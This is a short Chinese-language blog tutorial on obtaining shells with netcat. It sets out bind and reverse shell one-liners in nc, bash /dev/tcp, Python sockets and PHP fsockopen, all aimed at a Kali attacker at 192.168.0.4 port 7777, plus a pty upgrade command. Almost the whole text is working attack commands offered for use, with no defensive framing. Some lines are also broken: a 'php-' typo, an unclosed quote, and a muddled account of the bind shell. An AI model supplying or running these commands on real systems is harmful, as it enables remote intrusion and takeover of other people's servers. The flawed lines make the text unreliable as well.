NC如何反彈shell

這篇文章給大家分享的是有關NC如何反彈shell的內容。小編覺得挺實用的，因此分享給大家做個參考，一起跟隨小編過來看看吧。

假如ubuntu、CentOS為目標服務器系統

kali為攻擊者的系統，ip為：192.168.0.4，開放7777端口且沒被占用

最終是將ubuntu、CentOS的shell反彈到kali上

正向反彈shell

ubuntu或者CentOS上面輸入

nc -lvp 7777 -e /bin/bash

kali上輸入

nc ip 7777

正向反彈是目標機先執行nc命令，然后kali上再進行nc監聽，即可反彈shell。

需要目標機安裝nc。

反向反彈shell

方法1：bash反彈

bash -i >& /dev/tcp/ip/port 0>&1

但首先需要在kali上使用nc監聽端口：

nc -lvp 7777

此方法在ubuntu下不會反彈成功，CentOS可以反彈成功。

方法2：python反彈

反彈shell的命令如下：

代碼如下:

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

首先，使用nc在kali上監聽端口：

nc -lvp 7777

在CentOS或者ubuntu下使用python去反向連接，輸入：

代碼如下:

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.0.4',7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);

此方法ubuntu和Linux均反彈成功。

方法3

首先在kali上輸入nc監聽：

nc -lvp 7777

在CentOS或者ubuntu 上使用nc去反向連接，命令如下：

nc -e /bin/bash 192.168.0.4 7777

方法4：php反彈shell

首先在kali上輸入：

nc -lvp 7777

然后在目標機上輸入：

php- 'exec("/bin/bash -i >& /dev/tcp/192.168.0.4/7777")'

或

php -r '$sock=fsockopen("192.168.0.4",7777);exec("/bin/bash -i 0>&3 1>&3 2>&3");'

注意php反彈shell的這些方法都需要php關閉safe_mode這個選項，才可以使用exec函數。

 遇到反彈后不是正常的shell，可用命令：

python -c 'import pty;pty.spawn("/bin/bash")'

轉化為常規的shell。

感謝各位的閱讀！關于“NC如何反彈shell”這篇文章就分享到這里了，希望以上內容可以對大家有一定的幫助，讓大家可以學到更多知識，如果覺得文章不錯，可以把它分享出去讓更多的人看到吧！